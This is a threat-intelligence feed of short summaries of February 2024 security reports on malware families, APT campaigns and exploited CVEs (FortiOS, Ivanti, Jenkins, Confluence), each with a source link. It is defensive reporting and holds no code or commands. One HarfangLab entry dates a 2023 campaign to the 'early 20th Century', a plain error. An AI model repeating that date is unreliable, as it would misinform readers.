Fortinet has revealed a new critical Remote Code Execution vulnerability in FortiOS SSL VPN, cautioning about potential exploitation in ongoing attacks. The same report notes that the latest Ivanti flaw was possibly exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024).
Source: https://socradar.io/rces-in-fortios-ssl-vpn-shim-latest-ivanti-flaw-possibly-exploited-cve-2024-21762-cve-2023-40547-cve-2024-22024/
2024-02-12
LuaJIT_based_modular_backdoor_LuaDream_activity_by_Sandman_APT
LOW
Intel Source:
SOCRadar
Intel Name:
LuaJIT_based_modular_backdoor_LuaDream_activity_by_Sandman_APT
Date of Scan:
2024-02-12
Impact:
LOW
Summary:
SOCRadar's article, drawing on research provided by SentinelOne and QGroup, describes the Sandman APT group's highly sophisticated and stealthy attack methods, with a focus on a new modular backdoor known as LuaDream, which is built on the LuaJIT platform. LuaDream's design aims to minimize detection risk and shows a continuous development approach.
Source: https://socradar.io/dark-web-profile-sandman-apt/
2024-02-12
Examination_of_new_ShadowPad_infrastructure_new_threat_actor
LOW
Intel Source:
Hunt.io
Intel Name:
Examination_of_new_ShadowPad_infrastructure_new_threat_actor
Date of Scan:
2024-02-12
Impact:
LOW
Summary:
This post examines ShadowPad infrastructure linked to a yet-to-be-identified threat actor. What makes this activity different is a slight change in the HTTP response headers and the use of a certificate attempting to spoof the American technology company Dell. Within this group of IPs, there are additional subsets of activity using different port configurations and some interesting domains, discussed later in the article.
Source: https://hunt.io/blog/tracking-shadowpad-infrastructure-via-non-standard-certificates
2024-02-12
Increased_delivery_of_the_DarkGate_loader
LOW
Intel Source:
Eclecticiq
Intel Name:
Increased_delivery_of_the_DarkGate_loader
Date of Scan:
2024-02-12
Impact:
LOW
Summary:
EclecticIQ analysts observed increased delivery of the DarkGate loader following the takedown of the Qakbot infrastructure last year. EclecticIQ analysts are confident that financially motivated threat actors, including groups like TA577 and Ducktail, along with Ransomware-as-a-Service (RaaS) organizations such as BianLian and Black Basta, primarily use DarkGate. These threat actors target financial institutions in Europe and the USA, focusing mainly on double extortion tactics.
Source: https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors
2024-02-09
The_HijackLoader_Expands_Its_Evasion_Techniques
LOW
Intel Source:
Crowdstrike
Intel Name:
The_HijackLoader_Expands_Its_Evasion_Techniques
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
Researchers at CrowdStrike have discovered that, as other threat actors use the loader malware known as HijackLoader more frequently to deliver additional payloads and tooling, the threat actors behind it have developed new defense evasion techniques.
Source: https://www.crowdstrike.com/blog/hijackloader-expands-techniques/
2024-02-09
A_New_Rust_Written_MacOS_Backdoor_Ties_to_Windows_Ransomware
LOW
Intel Source:
Bitdefender
Intel Name:
A_New_Rust_Written_MacOS_Backdoor_Ties_to_Windows_Ransomware
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
Researchers at Bitdefender have uncovered a brand-new backdoor that targets macOS users. This previously undescribed malware family is written in Rust and has a number of intriguing properties. All detected files are distributed directly as FAT binaries containing Mach-O files for both x86_64 Intel and ARM architectures, and the backdoor appears to pose as a Visual Studio update.
Source: https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/
2024-02-09
The_malicious_use_of_maldocs
LOW
Intel Source:
Checkpoint
Intel Name:
The_malicious_use_of_maldocs
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
The article discusses the use of maldocs, or malicious documents, in spreading malware. It introduces the concept of maldocs and provides examples of different types of malware. The article also focuses on old and well-known CVEs used in Microsoft Word and Excel, and their continued threat to the cyber community. It discusses the techniques used by maldoc operators to evade detection and the challenges faced by researchers in analyzing them. The article concludes by emphasizing the need for different methods to deal with maldocs and providing resources for further reading.
Source: https://research.checkpoint.com/2024/maldocs-of-word-and-excel-vigor-of-the-ages/
2024-02-09
Exploitation_of_Confluence_Server_Vulnerability_CVE_2023_22527
LOW
Intel Source:
ArcticWolf
Intel Name:
Exploitation_of_Confluence_Server_Vulnerability_CVE_2023_22527
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
Researchers from Arctic Wolf have observed evidence of the C3RB3R ransomware and a number of other malicious payloads being deployed after the CVE-2023-22527 vulnerability was exploited. CVE-2023-22527 is being used by a number of threat actors to distribute payloads for trojans that gain remote access and mine cryptocurrencies.
Source: https://arcticwolf.com/resources/blog-uk/exploitation-of-confluence-server-vulnerability-cve-2023-22527-leading-to-c3rb3r-ransomware/
2024-02-09
SolarMarker_infections
LOW
Intel Source:
Esentire
Intel Name:
SolarMarker_infections
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
The article discusses the increasing prevalence of SolarMarker infections and the evolving tactics of the threat actor behind it. The eSentire Threat Response Unit (TRU) has been tracking SolarMarker since 2021 and has observed a significant increase in infections since November 2023. The threat actor has been using Inno Setup and PS2EXE tools to generate payloads, with recent payloads being modified using string replacements. The article also includes details on the PowerShell script used by SolarMarker, the loading of second-stage payloads, and the addition of junk instructions and byte arrays to evade detection. The TRU team recommends implementing controls such as Endpoint Detection and Response (EDR) solutions and security awareness training to protect against SolarMarker. The article also provides indicators of compromise and decrypted payloads for reference.
Source: https://www.esentire.com/blog/the-oncoming-wave-of-solarmarker
2024-02-09
The_injection_of_RemcosRAT_into_the_winhlp32_exe_file_process
MEDIUM
Intel Source:
Esentire
Intel Name:
The_injection_of_RemcosRAT_into_the_winhlp32_exe_file_process
Date of Scan:
2024-02-09
Impact:
MEDIUM
Summary:
The article discusses a recent threat investigation conducted by eSentire's Threat Response Unit (TRU). The investigation involved a suspicious ZIP archive containing an AnyDesk executable and a VBS file, delivered via a Discord CDN link. Further investigation revealed that the VBS file executed another VBS file hosted on paste[.]ee, which contained the DcRat malware. The DcRat malware had an encrypted configuration and supported dynamic loading and execution of plugins. The final payload retrieved via the plugin was a VBS file containing the RemcosRAT malware and dynwrapx.dll. The RemcosRAT malware was injected into the winhlp32.exe process and allowed remote control of the infected machine. The TRU team isolated the system and provided recommendations for protection against similar threats, such as user training and using Next-Gen AV or Endpoint Detection and Response tools. The article also includes indicators of compromise and references for further information.
Source: https://www.esentire.com/blog/from-onlydcratfans-to-remcosrat
2024-02-09
Attacks_on_Critical_Infrastructure_Exploiting_FortiOS_Vulnerabilities
LOW
Intel Source:
Fortinet
Intel Name:
Attacks_on_Critical_Infrastructure_Exploiting_FortiOS_Vulnerabilities
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
Researchers from Fortinet alerted companies on Wednesday that attacks targeting critical infrastructure and other sectors have been made possible by APTs associated with China and other nations, which have been exploiting two known FortiOS vulnerabilities.
Source: https://www.fortinet.com/blog/psirt-blogs/importance-of-patching-an-analysis-of-the-exploitation-of-n-day-vulnerabilities
2024-02-09
New_Zardoor_backdoor_used_in_the_cyber_espionage_operation
LOW
Intel Source:
Cisco Talos
Intel Name:
New_Zardoor_backdoor_used_in_the_cyber_espionage_operation
Date of Scan:
2024-02-09
Impact:
LOW
Summary:
The article discusses a new cyber espionage campaign, known as Zardoor, targeting an Islamic non-profit organization. The campaign uses a previously unreported malware family and advanced techniques to maintain access to the victim's network without detection. The article provides details on the execution flow of the Zardoor backdoor and how the threat actor maintains persistence using a dropper and malicious DLL files. It also describes the use of reverse proxy tools to bypass network security measures and provides information on how to detect and block this threat. The article concludes with a list of MITRE ATT&CK techniques used by the threat actor and a list of IOCs for further investigation.
Source: https://blog.talosintelligence.com/new-zardoor-backdoor/
2024-02-08
Its_Not_A_Comeback_of_KV_Botnet
LOW
Intel Source:
Lumen
Intel Name:
Its_Not_A_Comeback_of_KV_Botnet
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
According to Black Lotus Labs, since users are unlikely to notice an impact or possess the required monitoring forensic tools to detect an infection, KV-botnet attackers will likely continue to use medium- to high-bandwidth devices as a springboard in the geographic areas of their targets. Additionally, the Federal Bureau of Investigation (FBI) carried out a court-authorized takedown of the KV-botnet in early December 2023, according to a press release from the Department of Justice (DOJ).
Source: https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/?utm_source=rss&utm_medium=rss&utm_campaign=kv-botnet-dont-call-it-a-comeback
2024-02-08
The_PAPERWALL_malicious_campaign
LOW
Intel Source:
Citizenlab
Intel Name:
The_PAPERWALL_malicious_campaign
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
The article discusses the PAPERWALL network, a large and fast-growing network of Chinese websites posing as local news outlets. It provides information on the number of websites targeting various countries and the high-confidence host IP addresses. The article also discusses the attribution of PAPERWALL to a Chinese PR firm and the evidence linking it to the websites. It also mentions the use of hypestat.com to measure website traffic and the negligible traffic for most PAPERWALL domains. The article highlights the network's tactics, including the use of commercial press releases to disseminate pro-Beijing disinformation and ad hominem attacks. It also discusses the potential impact of these influence operations and the role of private firms in managing them. The article provides a breakdown of the types of content published on the PAPERWALL websites, including conspiracy theories, Chinese state media reposts, and scraping of local mainstream media. It also discusses the infrastructure and hosting of these websites, as well as the small number of content author names used. The article concludes by listing the confirmed domains and targeted countries, as well as acknowledging the research support and peer review from various individuals and organizations.
Source: https://citizenlab.ca/2024/02/paperwall-chinese-websites-posing-as-local-news-outlets-with-pro-beijing-content/
2024-02-08
Abuse_of_Squirrel_Installation_by_Multi_Stage_Banking_Trojan
LOW
Intel Source:
Securelist
Intel Name:
Abuse_of_Squirrel_Installation_by_Multi_Stage_Banking_Trojan
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
Securelist researchers have discovered a new malware family that is targeting customers of over 60 banking institutions, primarily in Brazil. Using a variety of cutting-edge technologies, it differs from well-known banking Trojan attacks.
Source: https://securelist.com/coyote-multi-stage-banking-trojan/111846/
2024-02-08
The_Raspberry_Robin_worm
LOW
Intel Source:
Checkpoint
Intel Name:
The_Raspberry_Robin_worm
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
The article discusses the latest version of the malware Raspberry Robin and its evasion techniques, including NtTraceEvent hooking and new evasion tricks. It also explains the changes in the malware's lateral movement logic and communication method. The article provides a comparison between the previous and current versions of the malware and describes its persistence method. It also discusses the ongoing threat of Raspberry Robin and how Check Point customers remain protected against it. The article includes a detailed analysis of the first stage of the malware and its use of APIs. It also provides a list of IOCs and onion domains associated with the malware.
Source: https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
2024-02-08
The_analysis_of_a_new_Clipper_dubbed_XPhase
LOW
Intel Source:
Cyble
Intel Name:
The_analysis_of_a_new_Clipper_dubbed_XPhase
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
The article discusses a new malware campaign, known as the "Doppelganger Dilemma," which targets cryptocurrency users through deceptive websites and mimicking legitimate crypto applications. The campaign primarily targets Indian users but also has phishing sites tailored to Russian users. The malware, named "XPhase Clipper," intercepts and modifies cryptocurrency wallet addresses copied by users. The campaign is linked to a previous phishing campaign and is believed to be carried out by the same threat actor. The article also highlights the use of a deceptive YouTube channel and provides technical analysis of the campaign. The abstract introduces the concept of adaptability and resourcefulness in sustaining cyber attacks, and the article concludes with recommendations for cybersecurity best practices and indicators of compromise for detecting the XPhase Clipper malware.
Source: https://cyble.com/blog/doppelganger-dilemma-new-xphase-clippers-proliferation-via-deceptive-crypto-sites-and-cloned-youtube-videos/
2024-02-08
A_Malicious_Python_Scripts_Targeting_Windows_Users
LOW
Intel Source:
ISC.SANS
Intel Name:
A_Malicious_Python_Scripts_Targeting_Windows_Users
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified a threat where malicious Python scripts are employed by threat actors to target Windows users, incorporating a keylogger. The recorded keystrokes are transmitted to a basic TCP connection established with the command and control server (C2), lacking any form of encryption, essentially sending raw keycodes.
Source: https://isc.sans.edu/diary/rss/30632
2024-02-08
BlueShell_Targeting_Linux_Systems_in_Korean_Attacks
LOW
Intel Source:
ASEC
Intel Name:
BlueShell_Targeting_Linux_Systems_in_Korean_Attacks
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
ASEC researchers have identified ongoing attacks on Korean Linux systems, where the BlueShell backdoor malware, upon installation, grants the threat actor full control over the compromised system.
Source: https://asec.ahnlab.com/en/61549/
2024-02-08
Avast_Q4_2023_Threat_Report
LOW
Intel Source:
Avast
Intel Name:
Avast_Q4_2023_Threat_Report
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
The Avast Q4/2023 Threat Report provides a comprehensive overview of the cyber threat landscape in the fourth quarter of 2023. It covers both desktop and mobile threats, highlighting the significant increase in blocked attacks and the resurgence of Qakbot. The report also discusses the use of Google OAuth API for malicious activities and the rise of malicious coinmining. It also covers the evolving mobile threat landscape, including the resurgence of the Chameleon banker and the spread of SpyLoans on the PlayStore. The report concludes with predictions for 2024 and emphasizes Avast's commitment to ensuring the safety of its users. The methodology used in the report is also explained, including the calculation of the "risk ratio" to measure the severity of specific threats. The report also discusses the prevalence and impact of RATs, rootkits, and web-based threats on mobile devices. It also covers the growing trend of mobile scams and the use of cell phones for online presence management. The report also highlights the dangers of adware and the need for dynamic and adaptive measures to counter it. It also discusses the prevalence of financial and dating scams, as well as the increase in fake online shops and phishing scams targeting post-holiday online shoppers. The report also mentions the use of standard tools and vulnerabilities by rootkits and APT groups, as well as Avast's efforts to address scam push notifications. It also discusses the distribution of malicious mods for popular messaging apps and the risk ratio for mobile spyware. The report also provides insights into the prevalence and impact of bots and coinminers, with a focus on specific threats and countries. Overall, the report highlights the constantly evolving and sophisticated nature of cyber threats and the need for increased cybersecurity measures to protect against them.
Source: https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/
2024-02-08
The_Golang_Stealer_Troll_and_GoBear_Backdoor
LOW
Intel Source:
S2W Blog
Intel Name:
The_Golang_Stealer_Troll_and_GoBear_Backdoor
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
S2W threat researchers have discovered a new malware sample associated with the Kimsuky group, named Troll Stealer. It is distributed through a dropper disguised as SGA Solutions' Trusted PKI installer. Troll Stealer is capable of stealing the GPKI folder on infected systems, indicating a potential focus on devices within administrative and public organizations in South Korea. Furthermore, the identification of additional malware signed with the same legitimate certificate raises the possibility of future distributions using that certificate.
Source: https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2
2024-02-08
A_malvertising_campaign_on_Facebook_still_on
LOW
Intel Source:
Malwarebytes
Intel Name:
A_malvertising_campaign_on_Facebook_still_on
Date of Scan:
2024-02-08
Impact:
LOW
Summary:
The article discusses a Facebook scam that has been ongoing for almost a year and is now appearing in different languages. The scam involves fake posts about fatal accidents and prompts users to click on a link, leading to malicious websites. The scammers use different tactics to target users based on their location and device. Tips on how to protect oneself from falling victim to this scam are provided, such as checking for unknown apps and enabling two-factor authentication. Malwarebytes' efforts to block these malicious websites are also mentioned, along with their Identity Theft Protection service as a way to safeguard personal information.
Source: https://www.malwarebytes.com/blog/news/2024/02/facebook-fatal-accident-scam-still-rages-on
2024-02-07
Jenkins_CVE_2024_23897_RCE
LOW
Intel Source:
Splunk
Intel Name:
Jenkins_CVE_2024_23897_RCE
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
This article discusses the recent discovery of a critical security vulnerability in Jenkins servers, which are commonly used for continuous integration and deployment in software development. The vulnerability, known as CVE-2024-23897, allows attackers to read files from the server's file system without authentication. The Splunk Threat Research Team has developed security analytics and hunting queries to help defenders protect against this exploit. The article provides an overview of the exploit and how it works, as well as a sample query for detecting it in Jenkins logs. It also discusses the use of a reverse proxy and logging Jenkins logs in Splunk for enhanced security. The author, Michael Haag, is also mentioned, along with references for further information.
Source: https://www.splunk.com/en_us/blog/security/security-insights-jenkins-cve-2024-23897-rce.html
2024-02-07
The_compromise_of_the_IT_environments_of_multiple_critical_infrastructures_by_Volt_Typhoon
HIGH
Intel Source:
CISA
Intel Name:
The_compromise_of_the_IT_environments_of_multiple_critical_infrastructures_by_Volt_Typhoon
Date of Scan:
2024-02-07
Impact:
HIGH
Summary:
CISA, NSA, and FBI released a joint Cybersecurity Advisory about People's Republic of China (PRC) state-sponsored cyber actors who are seeking to disrupt IT networks through cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. It is based on observations from the U.S. authoring agencies' incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations, primarily in the Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors, in the continental and non-continental United States and its territories, including Guam.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories?f%5B0%5D=advisory_type%3A65&f%5B1%5D=advisory_type%3A93&f%5B2%5D=advisory_type%3A94 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a https://www.cisa.gov/news-events/analysis-reports/ar24-038a
2024-02-07
The_distribution_of_Qshing_Emails
LOW
Intel Source:
F1tym1
Intel Name:
The_distribution_of_Qshing_Emails
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
The article discusses the distribution of Qshing emails, which are disguised as payslips and lead to malicious apps or phishing sites when a QR code is scanned. The sender email address is forged to appear legitimate, but the actual address can be seen in the email header. Scanning the QR code redirects users to a phishing site that prompts for personal information and can result in financial losses. The article provides IOC information and encourages users to subscribe to AhnLab's threat intelligence platform for more information.
Source: https://f1tym1.com/2024/02/02/distribution-of-qshing-emails-disguised-as-payslips/
2024-02-07
The_Distribution_of_Zephyr_CoinMiner
LOW
Intel Source:
ASEC
Intel Name:
The_Distribution_of_Zephyr_CoinMiner
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
The ASEC blog has discovered a CoinMiner targeting the Zephyr cryptocurrency, distributed through a compressed file named "WINDOWS_PY_M3U_EXPLOIT_2024.7z." The file creates scripts and executables, including an NSIS installer and two JavaScript files, executed via wscript.exe. The executable "x.exe" contains a compressed file and a legitimate "7za.exe" file, which, when decompressed with a specific password, creates two more AutoIt script files acting as a CoinMiner. Users are advised to be cautious when downloading files from unknown sources and to update their anti-malware solutions. The malware is detected by V3 and IOC information is provided for further investigation.
Source: https://asec.ahnlab.com/en/61164/
2024-02-07
The_fake_version_of_WhatsApp_linked_to_a_spyware
LOW
Intel Source:
Vice
Intel Name:
The_fake_version_of_WhatsApp_linked_to_a_spyware
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
Researchers have discovered a fake version of WhatsApp created by a spyware vendor, Cy4Gate, to gather information from iPhone users. The fake app was designed to trick users into installing a configuration file that could potentially collect data from their device. The company has a history of developing surveillance products and the fake WhatsApp page shared an encryption certificate with other domains associated with Cy4Gate. Although the company denied involvement, the researchers believe it is likely their product. The article also discusses Cy4Gate's Epeius product, which is designed for targeted surveillance and data collection.
Source: https://www.vice.com/en/article/akdqwa/a-spyware-vendor-seemingly-made-a-fake-whatsapp-to-hack-targets
2024-02-07
Analysis_of_phishing_campaign_disguised_as_a_famous_Korean_portal_login_page
LOW
Intel Source:
ASEC
Intel Name:
Analysis_of_phishing_campaign_disguised_as_a_famous_Korean_portal_login_page
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
The article discusses a recent phishing case where a fake login page was disguised as a popular Korean portal website. The threat actor collected login credentials and client information through the phishing page and used a legitimate plugin-type service to obtain more data. The article provides IOC information and advises caution when using login pages linked to emails from unknown sources.
Source: https://asec.ahnlab.com/en/61130/
2024-02-07
Lazarus_KandyKorn_malicious_DNS
LOW
Intel Source:
Infoblox
Intel Name:
Lazarus_KandyKorn_malicious_DNS
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
The article discusses the importance of early detection of malicious domains in preventing cyber attacks. It introduces Infoblox's DNS Early Detection Program, which uses proprietary techniques to identify potentially malicious domains and compares its analysis with data from public open source intelligence and commercial threat intelligence feeds. The program's findings and role in identifying suspicious domains are highlighted, along with an analysis of a phishing campaign by CSIRT KNF. The methodology used in the analysis and the advantages of using Infoblox's suspicious domain data are also discussed. The article is written by a senior product marketing manager at Infoblox with experience in cybersecurity.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-global-postal-services-phishing-campaign/
2024-02-07
A_Comprehensive_Analysis_of_Black_Hunt_Ransomware
LOW
Intel Source:
Rapid7
Intel Name:
A_Comprehensive_Analysis_of_Black_Hunt_Ransomware
Date of Scan:
2024-02-07
Impact:
LOW
Summary:
The article provides a comprehensive analysis of the Black Hunt ransomware, a new variant that was first reported in 2022. The article discusses the ransomware's features and capabilities, including its ability to encrypt various file extensions and evade detection by checking for debugging and targeting specific countries. It also explores the ransomware's code and functionality, including its encryption process, spreading mechanisms, and use of MITRE ATT&CK techniques. The article also provides an overview of the ransomware's malicious activities, such as modifying the Windows registry, disabling security measures, and inhibiting system recovery. It concludes with a list of indicators of compromise and a technical analysis of the ransomware's code.
Source: https://www.rapid7.com/blog/post/2024/02/05/exploring-the-not-so-secret-code-of-blackhunt-ransomware-2/
2024-02-06
Stately_Taurus_Cyber_Espionage_in_Myanmar
LOW
Intel Source:
CSIRT-CTI
Intel Name:
Stately_Taurus_Cyber_Espionage_in_Myanmar
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Between November 2023 and January 2024, cybersecurity teams uncovered a series of cyber attacks by Stately Taurus targeting Myanmar's military entities. The campaigns involved sophisticated malware delivery through phishing, using tactics like DLL hijacking and Cobalt Strike beacons. These efforts aimed at espionage against the Myanmar military, leveraging political tensions as bait for their attacks. The operation’s complexity and targeted nature highlight the ongoing cyber threats from state-sponsored actors in the region.
Source: https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/
2024-02-06
The_Public_Information_and_Spam_Email
LOW
Intel Source:
ISC.SANS
Intel Name:
The_Public_Information_and_Spam_Email
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Multiple organizations make their contact details available to the public so that people can ask for assistance when they need it. This could be a list of all staff members' public contacts or just general information. It should go without saying that having any information that is accessible to the public will make these accounts more vulnerable to spam or phishing emails.
Source: https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620
2024-02-06
C2_Hosting_Using_EtherHiding_by_SmartGaft
LOW
Intel Source:
QiAnXin X Laboratory
Intel Name:
C2_Hosting_Using_EtherHiding_by_SmartGaft
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Researchers from XLab have obtained Smargaft bot samples in two different versions for each of three CPU architectures: ARM, MIPS, and x86/64. The ability of these versions to spread like worms is the main distinction between them. In general, Smargaft functions quite simply. It checks the current user when it runs on a compromised device; if it is root, it starts additional scanning and propagation tasks. After that, it manipulates the watchdog to stop the device from restarting and binds to a local port to guarantee that only one instance is running at a time. It then initiates five actions, including using smart contracts to obtain its C2, launching DDoS attacks, and maintaining persistence on the device. Lastly, Smargaft cycles through these tasks at predetermined intervals in an endless loop.
Source: https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/
2024-02-06
The_Second_Round_of_Ivanti_Connect_Secure_VPN_ZeroDay_Exploitation
HIGH
Intel Source:
Cybereason
Intel Name:
The_Second_Round_of_Ivanti_Connect_Secure_VPN_ZeroDay_Exploitation
Date of Scan:
2024-02-06
Impact:
HIGH
Summary:
Researchers from Cybereason have looked into instances in which recently discovered zero-day vulnerabilities in Ivanti VPN appliances were exploited. These vulnerabilities were not patched at the time of disclosure. On January 10, 2024, Ivanti urged users to implement interim mitigations for two significant vulnerabilities impacting their Connect Secure and Policy Secure products, identified as CVE-2023-46805 and CVE-2024-21887. A third party published a Proof of Concept (PoC) on January 16, 2024, which led to an increase in the scope of exploitation. In addition to the existing threat, Ivanti disclosed two additional vulnerabilities on January 31: CVE-2024-21888, a privilege escalation flaw, and CVE-2024-21893, an SSRF web vulnerability. These vulnerabilities increase the need for action and heightened security awareness while the vendor continues to develop and deliver suitable mitigations.
Source: https://www.cybereason.com/blog/threat-alert-ivanti-connect-secure-vpn-zero-day-exploitation
Intel Source:
MP.WEIXIN.QQ
Intel Name:
Kimsuky_APT_Evolving_Tactics_targeted_Cyber_Espionage_Campaign
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Kimsuky APT, known for targeting South Korean military, expands cyber espionage to government entities. Recent tactics involve deceptive LNK files, with a focus on the financial sector. The group employs advanced techniques, including cloud services for communication, indicating an evolving threat landscape. Cybersecurity vigilance is crucial in countering Kimsuky's sophisticated and fileless attacks.
Source: https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ%3D%3D&mid=2247522061&idx=1&sn=22e56ee213d9e5229371ad3e082ebfab
Intel Source:
SeeBug
Intel Name:
New_Trojan_Tools_Used_by_APT_K_47_Group
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Researchers from SeeBug have discovered that the APT-K-47 group used an undisclosed Trojan tool. Following a successful intrusion, the tool downloads additional malicious payloads and ORPCBackdoor, traverses disk directories to steal target files, and then sends the data back to the command and control server (C2). Simultaneously, the group transmitted the password information back after stealing it from the target computer's browser.
Source: https://paper.seebug.org/3115/
Intel Source:
Krebsonsecurity
Intel Name:
Alleged_Medibank_Hacker_Aleksandr_Ermakov
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
The article discusses the recent financial sanctions imposed on Russian man Aleksandr Ermakov for his alleged involvement in the hacking of Australian health insurance company Medibank. Ermakov is believed to have worked with the ransomware group REvil and is accused of stealing and leaking sensitive data of 10 million customers. The section provides information on Ermakov's aliases, his connection to REvil, and his involvement in other cybercrime activities. It also mentions his affiliation with a Russian technology firm and his connection to a cybercriminal known as "Rescator." The article also discusses the potential impact of the sanctions on Ermakov's life and the challenges he may face in Russia as a result.
Source: https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/
Intel Source:
Fortinet
Intel Name:
The_distribution_of_Python_Info_stealer
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
In January 2024, FortiGuard Labs obtained an Excel document distributing an info-stealer related to a Vietnamese group first reported in August 2023. The attack uses simple downloaders to make detection harder. The info-stealer collects browsers' cookies and login data, compresses it, and sends it to the attacker's Telegram bot.
Source: https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
Intel Source:
GROUP-IB
Intel Name:
APAC_Job_Seekers_Data_Compromised_In_Massive_Breach
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
GROUP-IB researchers have discovered that ResumeLooters successfully targeted a minimum of 65 websites in 2023, using straightforward techniques such as SQL injection and XSS. The threat actor sought to insert XSS scripts into all accessible forms, with the intention of executing them on administrators' devices to acquire admin credentials.
Source: https://www.group-ib.com/blog/resumelooters/
Intel Source:
BI.ZONE
Intel Name:
Scaly_Wolf_Attacks_Russian_Business_With_White_Snake_Stealer
Date of Scan:
2024-02-06
Impact:
LOW
Summary:
Researchers from BI.ZONE have connected the Scaly Wolf group to at least ten campaigns. Russian companies across a range of industries, including manufacturing and logistics, faced attacks. One of the group's quirks is that it sends phishing emails pretending to come from Russian government agencies in order to obtain initial access. Documents purporting to be demands from Roskomnadzor, the Investigative Committee of the Russian Federation, and the Military Prosecutor's Office of the Russian Federation are among the lures in the criminals' phishing arsenal. The attackers occasionally disguise their emails as commercial offers.
Source: https://bi.zone/expertise/blog/scaly-wolf-primenyaet-stiler-white-snake-protiv-rossiyskoy-promyshlennosti/
Intel Source:
SentinelOne
Intel Name:
A_malware_campaign_infecting_cracked_macOS_apps
Date of Scan:
2024-02-05
Impact:
LOW
Summary:
Researchers discovered a malware campaign infecting cracked macOS apps from torrent sites to install a backdoor for further malware delivery. The malware disables security settings and then uses Python scripts to achieve persistence and retrieve additional payloads.
Source: https://www.sentinelone.com/blog/backdoor-activator-malware-running-rife-through-torrents-of-macos-apps/
Intel Source:
Akamai
Intel Name:
FritzFrog_Botnet_Currently_Using_Log4Shell_Bug
Date of Scan:
2024-02-05
Impact:
MEDIUM
Summary:
Akamai researchers have provided an explanation for the change in the FritzFrog botnet, which has been in existence since 2020. Typically, the botnet leverages brute-force attacks to breach SSH, a network connection protocol, in order to access servers and launch cryptominers. However, more recent versions now scan many system files on infected computers to identify targets that are very likely to be weak points for this attack.
Source: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
Intel Source:
Harfanglab
Intel Name:
The_exploitation_of_compromised_routers_to_target_goverment_in_Europe_and_Caucasus
Date of Scan:
2024-02-05
Impact:
MEDIUM
Summary:
A look back at a malicious espionage campaign that targeted government organisations in Ukraine and Poland in the early 20th Century and may have been carried out by a threat actor known as APT28. HarfangLab identified additional malicious files and infrastructure which they believe with high confidence are part of the same campaign. The campaign targeted government organisations in Ukraine and Poland at least (and possibly in Azerbaijan as well), started on 2023-12-13 at the latest, and abused legitimate Ubiquiti network devices as infrastructure. HarfangLab could not reliably link the described campaign to APT28 in particular.
Source: https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/
Intel Source:
RexorVc0
Intel Name:
Diving_Deep_into_Pony_Malware
Date of Scan:
2024-02-05
Impact:
LOW
Summary:
Pony, also called Fareit or Siplog, is malware classified as a loader and stealer that may also be used as a botnet; it has been around for over a decade and is still in use. This notorious malware is still available for purchase, still receives upgrades, and, in addition to stealing confidential data, has been used to launch other malware during attacks on victim infrastructures.
Source: https://rexorvc0.com/2024/02/04/Pony_Fareit/
Intel Source:
PaloAlto
Intel Name:
Examining_the_Newest_Stealer_Variant_of_Mispadu
Date of Scan:
2024-02-05
Impact:
LOW
Summary:
Researchers from Unit 42 have recently found activity linked to the covert infostealer known as Mispadu Stealer, which was first identified in 2019. While searching for attempts to exploit the CVE-2023-36025 vulnerability, they came upon a family of infostealer malware that targets particular regions and URLs frequently associated with Mexican nationals.
Source: https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/
Intel Source:
Any.Run
Intel Name:
CrackedCantil_malware
Date of Scan:
